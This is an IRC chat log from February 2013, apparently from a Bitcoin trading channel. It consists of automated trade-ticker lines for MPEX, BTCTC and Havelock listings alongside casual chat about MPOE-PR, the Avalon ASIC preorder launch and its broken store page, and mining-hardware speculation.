[BTCTC] [GSDPT] 9 @ 0.0075 = 0.0675 BTC [-] Feb 02 04:40:11 pocket aces :) Feb 02 04:42:52 [BTCTC] [GSDPT] 70 @ 0.0078 = 0.546 BTC [+] Feb 02 04:43:22 [MPEX] [S.MPOE] 3800 @ 0.00066581 = 2.5301 BTC [+] Feb 02 04:47:14 they weren't enough Feb 02 04:47:16 :( Feb 02 04:47:47 [MPEX] [S.MPOE] 521 @ 0.00066581 = 0.3469 BTC [+] Feb 02 04:47:49 [MPEX] [S.MPOE] 790 @ 0.00066582 = 0.526 BTC [+] Feb 02 04:47:50 [MPEX] [S.MPOE] 8723 @ 0.00066812 = 5.828 BTC [+] Feb 02 04:50:18 dude coinbase got a 600k seed round Feb 02 04:50:20 that is awesome Feb 02 04:50:37 and all they are doing is just online wallet.... Feb 02 04:52:59 [MPEX] [S.MPOE] 3000 @ 0.00066051 = 1.9815 BTC [-] Feb 02 04:56:28 kinda old news. Feb 02 04:56:39 [MPEX] [S.MPOE] 1402 @ 0.00066186 = 0.9279 BTC [+] Feb 02 04:59:33 [MPEX] [S.MPOE] 5927 @ 0.00066812 = 3.9599 BTC [+] Feb 02 04:59:35 [MPEX] [S.MPOE] 516 @ 0.0006682 = 0.3448 BTC [+] Feb 02 04:59:36 [MPEX] [S.MPOE] 657 @ 0.00066863 = 0.4393 BTC [+] Feb 02 05:02:19 yeah i know, but i am only trying to raise like 100k Feb 02 05:02:27 so i think it might work Feb 02 05:03:20 depends who you know. Feb 02 05:03:38 have you seen mpoe-pr's infamous "see here" thread ? Feb 02 05:08:18 its pretty cool that ycombinator chose them Feb 02 05:08:20 says a lot Feb 02 05:08:22 [MPEX] [S.DICE] 600 @ 0.007395 = 4.437 BTC [+] Feb 02 05:09:05 i already included mpex registration in the prospectus lol :) Feb 02 05:11:28 okay, this is the price chart of 5d for bitcoin-24. http://bitcoincharts.com/charts/chart.png?m=btc24EUR&v=1&t=S&noheader=1&height=80&width=750&r=5 its the only one ive seen like this. not huge volume but as much as many others and yet it is soooo level. I swear, many times ive seen bots respond to my bid, in less than <500ms latency. Im convinced the owners of the exchange have a bot at play on the exchange to keep prices close to mtgox or level or i do Feb 02 05:12:16 oh wait, maybe its just the volume adjusting the scale, and since that fluctuates so mutch one doesnt see much of the price fluctuation Feb 02 05:13:16 bleh, no, even the large chart looks odd Feb 02 05:14:39 aah, no it was the very odd huge 40eu range bid somewhere (glitch i guess) Feb 02 05:14:40 ignore me Feb 02 05:15:39 [MPEX] [S.MPOE] 10150 @ 0.00066863 = 6.7866 BTC [+] Feb 02 05:22:01 [MPEX] [S.MPOE] 2919 @ 0.00066186 = 1.932 BTC [-] Feb 02 05:22:03 [MPEX] [S.MPOE] 12670 @ 0.00066158 = 8.3822 BTC [-] Feb 02 05:22:19 [HAVELOCK] [KCIM] 2 @ 0.998 = 1.996 BTC [+] Feb 02 05:22:33 [MPEX] [S.MPOE] 330 @ 0.00066158 = 0.2183 BTC [-] Feb 02 05:22:34 [MPEX] [S.MPOE] 1276 @ 0.00065932 = 0.8413 BTC [-] Feb 02 05:22:35 [MPEX] [S.MPOE] 1276 @ 0.00065932 = 0.8413 BTC [-] Feb 02 05:23:17 [HAVELOCK] [KCIM] 7 @ 0.999 = 6.993 BTC [+] Feb 02 05:25:09 dude this is insane. Feb 02 05:25:18 SA loves only one thing in all of bitcoin more than me Feb 02 05:25:21 and that's mpoe-pr Feb 02 05:26:59 link? Feb 02 05:27:54 They'd probably worship MPOE-PR as Troll Goddess Feb 02 05:28:05 She's attacked pretty much everything they talk about =P Feb 02 05:29:05 Namworld you had the link earlier neh ? Feb 02 05:29:19 http://forums.somethingawful.com/showthread.php?threadid=3486823&userid=0&perpage=100&pagenumber= Feb 02 05:29:23 or whoever posted it Feb 02 05:29:26 yeah but over 300 pages... Feb 02 05:29:45 I won't browse the whole 300 pages to find whatever post you're talking about =P Feb 02 05:29:52 When you have the link handy Feb 02 05:30:36 [MPEX] [S.MPOE] 13400 @ 0.00065652 = 8.7974 BTC [-] Feb 02 05:30:37 or at least tell me the specific page Feb 02 05:31:09 # Feb 02 05:31:53 i don't have it i read digests. Feb 02 05:31:56 but let's spam irc Feb 02 05:32:05 oh Feb 02 05:32:12 It's like they want to scare away anyone serious about using Bitcoins as a currency, I wonder how much longer that woman who runs the (last standing) trading platform will put up with their dumb poo poo. She's hardly some great pillar of sanity since she's all wrapped up in Bitcoins too but she seems to be trying to be serious about things yet they want to shout her down. I am guessing it is because she is a woman. Feb 02 05:32:12 Mircea Popescu, who runs MPOE, is a guy. The MPOE-PR woman was accused of being his sock, but I think she just does all the English-language business for him (he's Romanian). Feb 02 05:32:12 Unless there is no Mircea and it's just that lady doing a "Remington Steele" thing, only instead of private eye poo poo it's Internet porn/Bitcoins. Feb 02 05:32:12 Agree that two of the smartest posters on there are women: MPOE-PR and repentance. Feb 02 05:32:12 VvvV. Also people mock MPOE because it's a subforum of a porn site. Go over and look at it; it's kind of crappy looking despite MPOE-PR's general good sense. Presumably someone else handles the web implementation. Feb 02 05:32:12 The brilliant Bitcoin detectives thought that there was only one person who was a guy (Mircea, which is a guy's name in Romanian) and he was just using a lady's picture as a sock. I am willing to believe they got it exactly backwards, and that she just made up "Mircea Popescu" as a sock. Feb 02 05:32:12 Oh well if it's two people then that's interesting. Some of the people on that forum did some internet detectiving and came to the conclusion that it's all one person but then again these are not the brightest people we are talking about... Feb 02 05:32:12 What a beautiful twist it would be if the last trading platform that didn't collapse or turn into a scam which is run more like an actual real one than a teenage dream out of the basement is run by a woman. Because they mock her, ostracize her and blame her at every turn possibly because they can't handle a girl running a service for them. Feb 02 05:32:12 Still, possibly the most legit bitcoin trading site they will ever get and yet they want this one to fai Feb 02 05:34:57 The forum says so... but most around assets channels seems to support MPEx Feb 02 05:35:25 well, sa stuff. to be taken with a grain fo salt. Feb 02 05:35:36 they pretty much only read/care about the trolls and nuts. Feb 02 05:36:05 Oddly, I thought about Mircea Popescu being the sock puppet instead when MPOE-PR was accused of being a sock puppet Feb 02 05:36:54 Namworld: mebbe they are both sock puppets of someone else? Feb 02 05:36:59 mebbe its satoshi >,> Feb 02 05:37:20 why does someone have to be a sock puppet ? Feb 02 05:37:31 more fun that way. :) Feb 02 05:37:39 eheh Feb 02 05:37:45 will be kinda hysterical if/when SA discovers like... stuff on trilema. Feb 02 05:37:58 besides, its generates talk. and "There's no such thing as bad press" ;) Feb 02 05:37:59 Well, it's not necessary. But when it was suggested, it made me think of the opposite. Feb 02 05:38:04 [BTCTC] [SYNERGY] 1 @ 0.1001 BTC [-] Feb 02 05:38:05 [BTCTC] [SYNERGY] 1 @ 0.1 BTC [-] Feb 02 05:38:23 [MPEX] [S.MPOE] 5894 @ 0.00065652 = 3.8695 BTC [-] Feb 02 05:39:01 generally not a bad strategy Feb 02 05:39:18 funny thread. have sa heard of bitcoingem?? please someone let them know about that Feb 02 05:41:20 BF just passed 350btc for 24hr vol Feb 02 05:41:36 Mircea Popescu - actually a sock puppet for the brits rebuilding their old empire. Starting with Bitcoins to vanquish US capitalism which is in their way. Feb 02 05:41:45 Sounds more fun like that Feb 02 05:42:57 They're still not happy about the outcome of the American War of Independence. Feb 02 05:43:00 [MPEX] [S.MPOE] 6200 @ 0.00066398 = 4.1167 BTC [+] Feb 02 05:43:31 why can't i be a sockpuppet for someone fun Feb 02 05:43:41 like, napoleon. Feb 02 05:44:09 but his life expectancy expired Feb 02 05:44:19 It would have to be zombie napoleon Feb 02 05:44:22 hm, that's a point. Feb 02 05:44:33 i wonder what zombie napoleon does for a living. Feb 02 05:45:31 So many people in the US focus on being one lottery win away from being rich, when they're actually one lost job or house fire or medical emergency away from being destitute. Feb 02 05:45:33 dude this is deep. Feb 02 05:45:47 [MPEX] [S.MPOE] 6706 @ 0.00066398 = 4.4526 BTC [+] Feb 02 05:45:49 [MPEX] [S.MPOE] 12344 @ 0.00066016 = 8.149 BTC [-] Feb 02 05:47:20 [MPEX] [S.MPOE] 4321 @ 0.00066862 = 2.8891 BTC [+] Feb 02 05:47:22 [MPEX] [S.MPOE] 11979 @ 0.00066863 = 8.0095 BTC [+] Feb 02 05:51:23 [MPEX] [S.DICE] 450 @ 0.007395 = 3.3278 BTC [+] Feb 02 05:54:35 [MPEX] [S.MPOE] 4649 @ 0.00066863 = 3.1085 BTC [+] Feb 02 05:54:37 [MPEX] [S.MPOE] 25862 @ 0.0006694 = 17.312 BTC [+] Feb 02 05:54:38 [MPEX] [S.MPOE] 21538 @ 0.00067 = 14.4305 BTC [+] Feb 02 06:04:53 [BTCTC] [LTC-MINING] 1 @ 0.3001 BTC [-] Feb 02 06:10:18 [HAVELOCK] [SDICE] 6 @ 0.7899999 = 4.74 BTC [+] Feb 02 06:13:42 [BTCTC] [LTC-MINING] 1 @ 0.3001 BTC [-] Feb 02 06:15:50 [MPEX] [S.MPOE] 4321 @ 0.00066032 = 2.8532 BTC [-] Feb 02 06:15:52 [MPEX] [S.MPOE] 5179 @ 0.00066016 = 3.419 BTC [-] Feb 02 06:16:30 What is K.KBRL on mpex, or what is the K. category? Feb 02 06:17:40 [BTCTC] [LTC-MINING] 6 @ 0.3 = 1.8 BTC [-] Feb 02 06:19:26 I heard it's a joke or something Feb 02 06:19:41 It's just there doing nothing all the time Feb 02 06:19:55 [MPEX] [S.MPOE] 4321 @ 0.00066981 = 2.8942 BTC [+] Feb 02 06:19:57 [MPEX] [S.MPOE] 5279 @ 0.00067 = 3.5369 BTC [+] Feb 02 06:26:27 [MPEX] [S.DICE] 1000 @ 0.007395 = 7.395 BTC [+] Feb 02 06:27:45 [BTCTC] [SYNERGY] 1 @ 0.1001 BTC [+] Feb 02 06:29:27 [MPEX] [S.MPOE] 9168 @ 0.00067 = 6.1426 BTC [+] Feb 02 06:33:38 [MPEX] [S.DICE] 1700 @ 0.007395 = 12.5715 BTC [+] Feb 02 06:39:09 [MPEX] [S.MPOE] 4321 @ 0.00066031 = 2.8532 BTC [-] Feb 02 06:39:11 [MPEX] [S.MPOE] 2179 @ 0.00066016 = 1.4385 BTC [-] Feb 02 06:41:19 [HAVELOCK] [SDICE] 10 @ 0.7899999 = 7.9 BTC [+] Feb 02 06:42:00 [BTCTC] [COGNITIVE] 39 @ 0.2401 = 9.3639 BTC [-] Feb 02 06:42:25 [BTCTC] [COGNITIVE] 1 @ 0.2733 BTC [+] Feb 02 06:42:44 Who needs my auto-updating portfolio scripts? Feb 02 06:42:54 [BTCTC] [SYNERGY] 1 @ 0.1001 BTC [+] Feb 02 06:43:01 [MPEX] [S.MPOE] 15000 @ 0.00066016 = 9.9024 BTC [-] Feb 02 06:43:34 [BTCTC] [COGNITIVE] 7 @ 0.31 = 2.17 BTC [+] Feb 02 06:45:12 [MPEX] [S.MPOE] 4050 @ 0.00066016 = 2.6736 BTC [-] Feb 02 06:45:46 lol portfolios Feb 02 06:46:09 [MPEX] [S.MPOE] 4321 @ 0.00066997 = 2.8949 BTC [+] Feb 02 06:46:10 [MPEX] [S.MPOE] 14015 @ 0.00067 = 9.3901 BTC [+] Feb 02 06:46:12 [MPEX] [S.MPOE] 8323 @ 0.00067093 = 5.5842 BTC [+] Feb 02 06:46:20 ? Feb 02 06:46:38 [BTCTC] [SYNERGY] 1 @ 0.1001 BTC [+] Feb 02 06:47:14 What's funny? Feb 02 06:47:18 [HAVELOCK] [SDICE] 2 @ 0.7899999 = 1.58 BTC [+] Feb 02 06:48:02 Namworld: who has portfolios anymore after glbse Feb 02 06:48:23 I do. Many others do. Feb 02 06:49:01 Wether it's only balance of bitcoin addresses, MPEx, BTCT.co, MtGox data Feb 02 06:50:08 [MPEX] [S.MPOE] 4321 @ 0.00066043 = 2.8537 BTC [-] Feb 02 06:50:10 [MPEX] [S.MPOE] 4789 @ 0.00066016 = 3.1615 BTC [-] Feb 02 06:50:19 [HAVELOCK] [SDICE] 2 @ 0.7899999 = 1.58 BTC [+] Feb 02 06:50:57 It's nice to tally up all that data Feb 02 06:51:09 [BTCTC] [BASIC-MINING] 20 @ 0.33 = 6.6 BTC [-] Feb 02 06:51:18 [HAVELOCK] [SDICE] 3 @ 0.7899999 = 2.37 BTC [+] Feb 02 06:54:14 [MPEX] [S.MPOE] 7059 @ 0.00066016 = 4.6601 BTC [-] Feb 02 06:54:16 [MPEX] [S.MPOE] 5000 @ 0.00065394 = 3.2697 BTC [-] Feb 02 06:54:17 [MPEX] [S.MPOE] 4941 @ 0.0006535 = 3.2289 BTC [-] Feb 02 06:56:46 [MPEX] [S.DICE] 400 @ 0.007395 = 2.958 BTC [+] Feb 02 07:03:58 [MPEX] [S.DICE] 6700 @ 0.007395 = 49.5465 BTC [+] Feb 02 07:09:06 [MPEX] [S.MPOE] 16500 @ 0.00066603 = 10.9895 BTC [+] Feb 02 07:09:08 [MPEX] [S.MPOE] 1700 @ 0.00065808 = 1.1187 BTC [-] Feb 02 07:11:18 [MPEX] [S.DICE] 400 @ 0.00721784 = 2.8871 BTC [-] Feb 02 07:11:20 [MPEX] [S.DICE] 550 @ 0.00721783 = 3.9698 BTC [-] Feb 02 07:13:46 [MPEX] [S.MPOE] 4321 @ 0.00067092 = 2.899 BTC [+] Feb 02 07:13:48 [MPEX] [S.MPOE] 11079 @ 0.00067093 = 7.4332 BTC [+] Feb 02 07:14:40 [MPEX] [S.MPOE] 5233 @ 0.00065808 = 3.4437 BTC [-] Feb 02 07:14:42 [MPEX] [S.MPOE] 4321 @ 0.00065351 = 2.8238 BTC [-] Feb 02 07:14:43 [MPEX] [S.MPOE] 8146 @ 0.0006535 = 5.3234 BTC [-] Feb 02 07:18:05 [MPEX] [S.MPOE] 2898 @ 0.00067093 = 1.9444 BTC [+] Feb 02 07:18:06 [MPEX] [S.MPOE] 4321 @ 0.00067182 = 2.9029 BTC [+] Feb 02 07:18:07 [MPEX] [S.MPOE] 2747 @ 0.00067183 = 1.8455 BTC [+] Feb 02 07:20:43 [MPEX] [S.MPOE] 950 @ 0.00065372 = 0.621 BTC [-] Feb 02 07:22:17 [MPEX] [S.MPOE] 3371 @ 0.00065372 = 2.2037 BTC [-] Feb 02 07:22:19 [MPEX] [S.MPOE] 13700 @ 0.0006535 = 8.953 BTC [-] Feb 02 07:28:12 [MPEX] [S.DICE] 50000 @ 0.007395 = 369.75 BTC [+] Feb 02 07:30:56 [MPEX] [S.DICE] 986 @ 0.007395 = 7.2915 BTC [+] **** BEGIN LOGGING AT Sat Feb 2 13:11:58 2013 Feb 02 13:13:22 [MPEX] [S.MPOE] 2695 @ 0.0006763 = 1.8226 BTC [+] Feb 02 13:17:11 [HAVELOCK] [KCIM] 1 @ 1 BTC [+] Feb 02 13:22:32 2 hours and 37 moar mins till Avalon starts asking for mahknee Feb 02 13:22:41 eh ? Feb 02 13:22:50 details! Feb 02 13:23:27 http://launch.avalon-asics.com/#prices Feb 02 13:24:32 9 am est translates to 6 am pacific Feb 02 13:24:49 i did not see this dump coming.. wow fuck. Feb 02 13:24:55 ;; ticker Feb 02 13:24:56 BTCUSD ticker | Best bid: 19.30000, Best ask: 19.34999, Bid-ask spread: 0.04999, Last trade: 19.36999, 24 hour volume: 90761.44676475, 24 hour low: 18.00000, 24 hour high: 21.10000, 24 hour vwap: 19.83651 Feb 02 13:25:15 o hey. going down ? Feb 02 13:25:24 someone dumped a lot of btc Feb 02 13:25:48 I had 80 BTC set aside for Asic.. in case it goes down a bit.. but not this much! Feb 02 13:26:01 I'm not sure if the price includes shipping or not. Feb 02 13:26:19 well.. mhm Feb 02 13:26:34 id hate to sell some dice shares Feb 02 13:28:40 [MPEX] [O.BTCUSD.P200T] 800 @ 0.20664775 = 165.3182 BTC [+] Feb 02 13:29:01 how much is the new avalon ?! Feb 02 13:29:06 wasn't it supposed to be 1200 ? Feb 02 13:29:11 1499 Feb 02 13:29:27 1299 for first batch, 1499 for a slightly upgraded one Feb 02 13:30:19 im confident bfl wont pull their heads out of their asses, some delay will happen again Feb 02 13:30:34 and avalon will ship batch no 2 before bfl Feb 02 13:30:40 maybe so. Feb 02 13:30:46 ;;calc 1499 / 19.83 Feb 02 13:30:47 75.5925365608 Feb 02 13:30:50 I expect around 58 TH by the time i get mine Feb 02 13:30:55 ovr 80 with shipping ? Feb 02 13:31:09 I'm not sure how much the shipping is gonna be.. Feb 02 13:31:23 bowjob i have serious doubts about avalon. so far as best we can determine they have not delivered. Feb 02 13:31:55 it's Feb 2. three weeks later. shipping takes 3 weeks for EVERYONE in a 300 order batch ? Feb 02 13:33:45 well, out of all the asic producers, only avalon produced a real asic so far, that makes them more credible than anyone else Feb 02 13:35:09 more credible than anyone else, yes. Feb 02 13:35:11 the no refunds part make sense.. they need the order the parts right away Feb 02 13:35:25 as for BTC.. isnt what what we want? for BTC to be used Feb 02 13:35:37 that's not the point tho. Feb 02 13:35:57 the point is that until they delvier batch 1 you can't tell whether they do or don't deliver at all. Feb 02 13:36:15 putting together 2 units out of a 300 unit run is not the same as having made 300 units. Feb 02 13:36:31 mhm, yes i see that. Feb 02 13:37:02 i dont think waiting is really an option.. that 600 unit order will get eaten Feb 02 13:37:06 in half an hour Feb 02 13:37:18 they mean until next order Feb 02 13:37:40 psycho: you do? Feb 02 13:37:47 how many units were in batch 1 ? Feb 02 13:38:48 20 mins for 300 ASICs back in september.. now that they have actually shipped 2 units, it could be 10 minutes, actually Feb 02 13:39:23 gosh, basic.. have you seen the letter? Feb 02 13:39:34 the slanderous note on Basic's site. Feb 02 13:40:02 how could you be so anti avalon when basic looks even worse Feb 02 13:40:19 i am not buying any asics. Feb 02 13:40:35 yet you bought 3? Feb 02 13:40:40 me ?! Feb 02 13:40:45 Psychotic Feb 02 13:40:48 a nm Feb 02 13:41:19 I'd consider Avalon to be a 1/6 confirmation phase. Feb 02 13:41:50 I'll look into what delays the shipment, see if I can get any answers from Yifu before they go on sale Feb 02 13:42:53 Well, owning S.Dice shares is like owning ASICs.. and I have some of those Feb 02 13:44:16 I'm currently long BTC, long S.Dice 50/50 split. I'd rather not disrupt that ratio.. and I took the Avalon into account Feb 02 13:46:13 i don't see how sdice and asics would be similar investments. Feb 02 13:46:27 sdice is, theoretically at least, bound to have slowly rising returns Feb 02 13:46:43 asics are, again theoretically, bound to have huge returns early Feb 02 13:46:44 then taper off Feb 02 13:46:50 I meant the price appreciation over the past month. ^ Feb 02 13:46:53 exactly opposite sort of curves Feb 02 13:47:14 the dividends are just cherry on top Feb 02 13:48:22 For instance, I got some at xx48, price is now xx73 ... thats like having lots of asics mining and appreciating on value Feb 02 13:49:37 im on the "BFL won't ship before march 1st" crowd.. Feb 02 13:51:21 a. Feb 02 13:51:32 well then... you stand to make whatever portion of 700 btc Feb 02 13:52:09 o, also : http://trilema.com/2013/lets-make-it-one-giant-puzzle/ Feb 02 13:52:14 identify all 6, get a bitcoin. Feb 02 13:56:45 [BTCTC] [B.YABMC] 14 @ 0.0249 = 0.3486 BTC [+] Feb 02 13:57:13 [MPEX] [S.MPOE] 4958 @ 0.0006735 = 3.3392 BTC [-] Feb 02 13:57:15 [MPEX] [S.MPOE] 92 @ 0.00067602 = 0.0622 BTC [+] Feb 02 13:57:16 [MPEX] [O.BTCUSD.P300T] 75 @ 0.70983809 = 53.2379 BTC Feb 02 13:57:28 hm Feb 02 13:57:31 so puts are now selling ? Feb 02 13:57:53 [BTCTC] [B.YABMC] 86 @ 0.0249 = 2.1414 BTC [+] Feb 02 13:57:55 [BTCTC] [B.YABMC] 14 @ 0.0249 = 0.3486 BTC [+] Feb 02 14:02:03 [MPEX] [S.MPOE] 4125 @ 0.00067602 = 2.7886 BTC [+] Feb 02 14:02:05 [MPEX] [S.MPOE] 4321 @ 0.00067603 = 2.9211 BTC [+] Feb 02 14:02:05 [MPEX] [S.MPOE] 8404 @ 0.00067628 = 5.6835 BTC [+] Feb 02 14:02:26 Jeff's Avalon unit is pulling 620 watts Feb 02 14:02:30 jesus fuck i guessed it! Feb 02 14:07:59 [MPEX] [S.MPOE] 6699 @ 0.00067628 = 4.5304 BTC [+] Feb 02 14:09:10 [MPEX] [S.MPOE] 6400 @ 0.0006751 = 4.3206 BTC [-] Feb 02 14:09:11 [MPEX] [S.MPOE] 4321 @ 0.00067292 = 2.9077 BTC [-] Feb 02 14:09:13 [MPEX] [S.MPOE] 229 @ 0.00067275 = 0.1541 BTC [-] Feb 02 14:09:14 [MPEX] [S.MPOE] 229 @ 0.00067275 = 0.1541 BTC [-] Feb 02 14:15:29 [MPEX] [S.MPOE] 4321 @ 0.00067622 = 2.9219 BTC [+] Feb 02 14:15:30 [MPEX] [S.MPOE] 5600 @ 0.00067628 = 3.7872 BTC [+] Feb 02 14:15:32 [MPEX] [S.MPOE] 5600 @ 0.00067628 = 3.7872 BTC [+] Feb 02 14:19:04 [MPEX] [S.MPOE] 12000 @ 0.00067628 = 8.1154 BTC [+] Feb 02 14:31:27 [MPEX] [S.MPOE] 8950 @ 0.00067622 = 6.0522 BTC [-] Feb 02 14:35:15 ;;ticker Feb 02 14:35:16 BTCUSD ticker | Best bid: 19.55507, Best ask: 19.70000, Bid-ask spread: 0.14493, Last trade: 19.55204, 24 hour volume: 88101.48921973, 24 hour low: 18.00000, 24 hour high: 21.10000, 24 hour vwap: 19.78760 Feb 02 14:41:08 [MPEX] [S.MPOE] 7000 @ 0.00067321 = 4.7125 BTC [-] Feb 02 14:41:09 [MPEX] [S.MPOE] 3865 @ 0.00067622 = 2.6136 BTC [+] Feb 02 14:41:11 [MPEX] [S.MPOE] 335 @ 0.00067628 = 0.2266 BTC [+] Feb 02 14:41:12 [MPEX] [S.MPOE] 335 @ 0.00067628 = 0.2266 BTC [+] Feb 02 14:56:22 [MPEX] [S.MPOE] 4618 @ 0.00067471 = 3.1158 BTC [-] Feb 02 14:56:24 [MPEX] [S.MPOE] 4321 @ 0.00067285 = 2.9074 BTC [-] Feb 02 14:56:25 [MPEX] [S.MPOE] 8371 @ 0.00067275 = 5.6316 BTC [-] Feb 02 14:56:26 [MPEX] [S.MPOE] 8750 @ 0.00067212 = 5.8811 BTC [-] Feb 02 14:56:27 [MPEX] [S.MPOE] 8750 @ 0.00067212 = 5.8811 BTC [-] Feb 02 14:56:28 [MPEX] [S.MPOE] 7900 @ 0.00066659 = 5.2661 BTC [-] Feb 02 14:56:29 [MPEX] [S.MPOE] 7900 @ 0.00066659 = 5.2661 BTC [-] Feb 02 14:56:30 [MPEX] [S.MPOE] 2100 @ 0.000666 = 1.3986 BTC [-] Feb 02 14:56:31 [MPEX] [S.MPOE] 2100 @ 0.000666 = 1.3986 BTC [-] Feb 02 14:56:32 [MPEX] [S.MPOE] 2990 @ 0.00066464 = 1.9873 BTC [-] Feb 02 14:56:33 [MPEX] [S.MPOE] 2990 @ 0.00066464 = 1.9873 BTC [-] Feb 02 14:57:45 [MPEX] [S.MPOE] 3700 @ 0.00066495 = 2.4603 BTC [+] Feb 02 15:01:06 bah for the love of christ. Feb 02 15:04:12 when i read your comment, I thought someone fat fingered S.dice again Feb 02 15:08:45 [MPEX] [S.DICE] 311 @ 0.00730376 = 2.2715 BTC [-] Feb 02 15:08:46 [MPEX] [S.DICE] 89 @ 0.00729494 = 0.6492 BTC [-] Feb 02 15:14:17 [MPEX] [S.DICE] 467 @ 0.00739 = 3.4511 BTC [+] Feb 02 15:15:20 lol https://bitcointalk.org/index.php?topic=129558.msg1497301#msg1497301 Feb 02 15:21:14 no, im just getting an echo in reporting trades now ;/ Feb 02 15:21:27 kakobrekla you do it :D Feb 02 15:22:14 done Feb 02 15:22:40 [BTCTC] [BASIC-MINING] 10 @ 0.3399 = 3.399 BTC [+] Feb 02 15:22:51 [BTCTC] [BASIC-MINING] 2 @ 0.34 = 0.68 BTC [+] Feb 02 15:22:53 [BTCTC] [BASIC-MINING] 3 @ 0.35 = 1.05 BTC [+] Feb 02 15:25:30 [MPEX] [S.MPOE] 12000 @ 0.00067275 = 8.073 BTC [+] Feb 02 15:25:34 [BTCTC] [LTC-MINING] 1 @ 0.4099 BTC [+] Feb 02 15:28:12 [HAVELOCK] [SDICE] 19 @ 0.79 = 15.01 BTC [+] Feb 02 15:35:46 [MPEX] [S.MPOE] 621 @ 0.00066954 = 0.4158 BTC [-] Feb 02 15:35:49 [MPEX] [S.MPOE] 1279 @ 0.00066941 = 0.8562 BTC [-] Feb 02 15:54:03 [MPEX] [S.MPOE] 1279 @ 0.00066941 = 0.8562 BTC [-] Feb 02 15:54:05 dafuq Feb 02 15:54:13 we had 18 dollar coins Feb 02 15:54:16 not long ago. Feb 02 15:54:18 yes Feb 02 15:55:13 [MPEX] [S.MPOE] 7900 @ 0.00066424 = 5.2475 BTC [-] Feb 02 15:55:34 [MPEX] [S.MPOE] 3882 @ 0.00066081 = 2.5653 BTC [-] Feb 02 15:55:49 [MPEX] [S.MPOE] 19700 @ 0.00066147 = 13.031 BTC [+] Feb 02 15:56:10 luck this time, bought my road tax vignette with 21 dollar coins :) Feb 02 15:56:38 [MPEX] [S.MPOE] 3882 @ 0.00066081 = 2.5653 BTC [-] Feb 02 15:57:01 [MPEX] [S.MPOE] 3882 @ 0.00066081 = 2.5653 BTC [-] Feb 02 16:12:36 [MPEX] [S.MPOE] 1 @ 0.0006762 BTC [+] Feb 02 16:14:02 [MPEX] [S.MPOE] 1 @ 0.0006762 BTC [+] Feb 02 16:19:37 [MPEX] [S.MPOE] 4215 @ 0.0006762 = 2.8502 BTC [+] Feb 02 16:19:43 [MPEX] [S.MPOE] 2900 @ 0.00067621 = 1.961 BTC [+] Feb 02 16:20:11 if anyone is curious : http://trilema.com/2013/mpex-tech-stuff/ Feb 02 16:25:49 avalon ordered. Feb 02 16:26:29 no trolling Feb 02 16:26:33 LOL Feb 02 16:26:34 [MPEX] [S.DICE] 800 @ 0.00739 = 5.912 BTC [+] Feb 02 16:26:38 did you ctrl-f5? Feb 02 16:26:39 :P Feb 02 16:27:10 alright alright. sigh Feb 02 16:27:26 this is kinda stupid this Feb 02 16:27:27 tho Feb 02 16:27:37 its like a kid waking up for xmas, running downstairs Feb 02 16:27:41 to find ZERO presents Feb 02 16:28:12 I think Yifu did th ebetter trollig job Feb 02 16:28:19 "look at this idiots waking up for nothing" Feb 02 16:30:04 wow. avalon still cant get their act together Feb 02 16:30:38 i feel rather disrispected that i stayed up all night and they cant even set up a pre order properly. wtf Feb 02 16:31:30 yeah ,its 8am, i'm pretty friggen tired Feb 02 16:32:40 its on now Feb 02 16:35:32 no Feb 02 16:35:32 its fial Feb 02 16:35:34 checkout fail Feb 02 16:35:41 "There appears to be an error with this site." Feb 02 16:36:30 fail. cart broken Feb 02 16:36:40 do we need a wordpress account? Feb 02 16:36:51 it sys i have 3 asics wtf Feb 02 16:37:07 why does my order total say $3? Feb 02 16:37:39 Geezus Christ Feb 02 16:39:15 now it's $1 Feb 02 16:39:18 should i pay? Feb 02 16:39:18 such a shoddy site Feb 02 16:39:29 im having problems with it Feb 02 16:40:40 maybe its indeed a scam Feb 02 16:41:12 [MPEX] [S.MPOE] 1421 @ 0.00067621 = 0.9609 BTC [+] Feb 02 16:41:14 [MPEX] [S.MPOE] 2000 @ 0.00067622 = 1.3524 BTC [+] Feb 02 16:41:22 [MPEX] [S.MPOE] 2717 @ 0.00067628 = 1.8375 BTC [+] Feb 02 16:41:24 [MPEX] [S.MPOE] 6150 @ 0.00067674 = 4.162 BTC [+] Feb 02 16:41:27 [MPEX] [S.MPOE] 2000 @ 0.00067702 = 1.354 BTC [+] Feb 02 16:41:29 [MPEX] [S.MPOE] 6912 @ 0.00067703 = 4.6796 BTC [+] Feb 02 16:44:25 bowjob what, still no orders ? Feb 02 16:45:21 they opened up the orders, the problem is no one can fill them.. the site is broken Feb 02 16:45:33 http://store.avalon-asics.com/ Feb 02 16:45:40 sux. Feb 02 16:45:46 wait until they turn off caching and cdn Feb 02 16:45:50 if mpex is dog, that site is dog shit's dog shit. Feb 02 16:46:04 do not try to complete an order until they do, you will lose coins Feb 02 16:46:30 ^^ Feb 02 16:46:35 he knows. Feb 02 16:46:50 of course not. i'll wait for them to fix it before provably throwing away 80 BTC Feb 02 16:47:36 china will grow larger. Feb 02 16:49:30 "look on the bright side. this is probably a good indication of how your unit would work." Feb 02 16:49:44 ahahaha Feb 02 16:49:48 Yeap. May as well switch to BFL, but pay with PayPal Feb 02 16:49:50 tha'ts just mean Feb 02 16:49:52 that way I got my ass covered Feb 02 16:53:01 i will buy 2nd hand asics from the people who borrowed on their credit cards to buy them and underestimated the difficulty rise or don't getthem soon enough Feb 02 16:53:30 I'm already willing to throw 80 BTC to some potential scam and yet they can't set up a way to facilitate the transfer Feb 02 16:53:34 *yawn Feb 02 16:58:23 Fuck this shit. I'm too tired. I've been awake for nearly 36 hours, I've spent the majority of the time walking around. Congrats to the (un)fortunate fucker who will get my spot. Feb 02 16:58:59 I'll buy something called hold, it costs nothing and it's done me good so far. Feb 02 17:03:13 another satisfied asic customer Feb 02 17:03:21 soon we'll have enough for a private army. Feb 02 17:14:22 fuckfuck mpex did it again Feb 02 17:15:01 mircea_popescu: please do at least check of output data.. so it outputs some error instead of nonsense Feb 02 17:15:02 ? Feb 02 17:15:24 it sent me valid json but no balances/orders Feb 02 17:15:39 [HAVELOCK] [KCIM] 2 @ 1 = 2 BTC [+] Feb 02 17:16:07 mmm Feb 02 17:16:19 jurov : email me a copy of this thing Feb 02 17:19:02 [MPEX] [S.DICE] 389 @ 0.00729494 = 2.8377 BTC [-] Feb 02 17:21:50 https://bitcointalk.org/index.php?topic=140700.0 vircurex is listing its exchange Feb 02 17:21:57 you planning the same with weex Ukto ? Feb 02 17:22:03 [MPEX] [S.MPOE] 7250 @ 0.00067714 = 4.9093 BTC [+] Feb 02 17:24:29 does anyone want to make a scam accusation thread against imsaguy? 